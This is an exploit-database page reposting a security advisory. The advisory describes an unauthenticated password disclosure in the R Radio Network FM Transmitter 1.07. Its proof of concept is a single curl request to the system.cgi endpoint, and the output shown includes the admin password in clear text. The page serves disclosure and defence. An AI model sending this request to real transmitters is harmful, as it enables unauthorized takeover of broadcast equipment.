R radio network fm transmitter 1.07 system.cgi password disclosure Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-03-03 | Type : remote | Platform : hardware
This exploit / vulnerability R radio network fm transmitter 1.07 system.cgi password disclosure is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure


Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.

Tested on: CSBtechDevice


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php


09.10.2023

--


$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$

R radio network fm transmitter 1.07 system.cgi password disclosure


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
R radio network fm transmitter 1.07 system.cgi password disclosure Vulnerability / Exploit